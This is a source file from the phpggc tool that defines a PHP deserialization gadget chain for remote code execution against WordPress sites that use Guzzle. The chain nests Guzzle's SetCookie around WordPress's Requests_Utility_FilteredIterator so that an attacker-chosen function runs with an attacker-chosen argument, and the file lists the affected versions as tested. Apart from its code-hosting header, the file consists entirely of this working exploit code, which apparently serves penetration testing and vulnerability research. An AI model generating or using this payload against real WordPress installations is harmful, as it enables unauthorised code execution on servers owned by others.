Codebase list phpggc / a334346 gadgetchains / WordPress / Guzzle / RCE / 1 / chain.php
a334346

Tree @a334346 (Download .tar.gz)

chain.php @a334346raw · history · blame

<?php

namespace GadgetChain\WordPress\Guzzle;

class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '4.0.0 <= 6.4.1+ & WP < 5.5.2';
    public static $vector = '__toString';
    public static $author = 'erwan_lr';
    public static $information = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.';

    public function generate(array $parameters)
    {
        $function = $parameters['function'];
        $parameter = $parameters['parameter'];

        return new \GuzzleHttp\Cookie\SetCookie(
            new \Requests_Utility_FilteredIterator(['Name' => $parameter, 'Value' => ''], $function)
        );
    }
}